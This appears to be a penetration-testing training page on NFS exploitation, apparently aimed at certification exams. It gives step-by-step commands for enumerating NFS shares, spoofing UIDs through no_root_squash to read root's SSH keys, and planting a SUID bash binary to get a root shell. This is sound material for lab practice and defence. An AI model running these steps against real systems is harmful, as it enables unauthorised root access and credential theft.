← Research Hub
Infrastructure

NFS Exploitation

NFS share enumeration, no_root_squash UID spoofing for privilege escalation, SUID binary planting, and NFSv3 version fingerprinting techniques.

NFS Enumeration

# Discover NFS services
nmap -sV -p 111,2049 10.10.10.0/24
nmap -p 111 --script nfs-ls,nfs-showmount,nfs-statfs 10.10.10.5

# Show exported shares
showmount -e 10.10.10.5
# Output: /share  *(rw,no_root_squash)
#         /home   10.10.10.0/24(ro)

# RPC info
rpcinfo -p 10.10.10.5

Mounting Shares

# Mount NFS share
sudo mkdir /mnt/nfs
sudo mount -t nfs 10.10.10.5:/share /mnt/nfs -o nolock

# List contents
ls -la /mnt/nfs

# Unmount
sudo umount /mnt/nfs

no_root_squash UID Spoofing

no_root_squash: By default, NFS maps remote root (UID 0) to nfsnobody (root squash). When disabled with no_root_squash, the remote root user keeps root privileges on the share. You can spoof any UID.

# Check export options (look for no_root_squash)
cat /etc/exports  # if you have local access on server
showmount -e 10.10.10.5  # remote check

# To exploit: create local user with same UID as target file owner
# Example: file owned by UID 1000 on remote
ls -lan /mnt/nfs/  # shows numeric UIDs

# Create local user with matching UID
sudo useradd -u 1000 fakeuser
sudo su fakeuser
# Now you own files that belong to UID 1000 on the share

# For root squash disabled shares β€” use root directly:
sudo -i
# You ARE UID 0 β†’ no_root_squash gives you root on the share
ls /mnt/nfs/root/.ssh/  # read root's SSH keys!

SUID Binary Attack

# With no_root_squash, plant a SUID binary
# As root on your Kali:
sudo -i
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
ls -la /mnt/nfs/bash
# -rwsr-xr-x 1 root root ... bash

# On target machine (after SSH/shell access):
/mnt/nfs/bash -p
# -p flag preserves SUID β€” gives root shell!
whoami  # root
Requirement: You need a shell on the target machine AND be able to execute files from the NFS mount. The SUID bit is set on your Kali (UID 0 side) and read from the mounted share on target.

Exam Tips

  • Always run showmount -e during enumeration β€” NFS is commonly missed
  • World-readable shares (*(ro)) can still expose sensitive files β€” SSH keys, configs, database passwords
  • NFSv4 uses numeric UIDs differently β€” test with -o vers=3 mount option if v4 fails
  • Check /etc/exports if you get a foothold β€” the no_root_squash option on home directories is a quick privesc
  • No firewall filtering port 2049? That's NFS β€” always try showmount
// CONTENTS
NFS Enumeration Mounting Shares no_root_squash UID Spoofing SUID Binary Attack Exam Tips
← Shadow Credentials Attack Docker / LXD Container Escape β†’ ↩ Back to Hub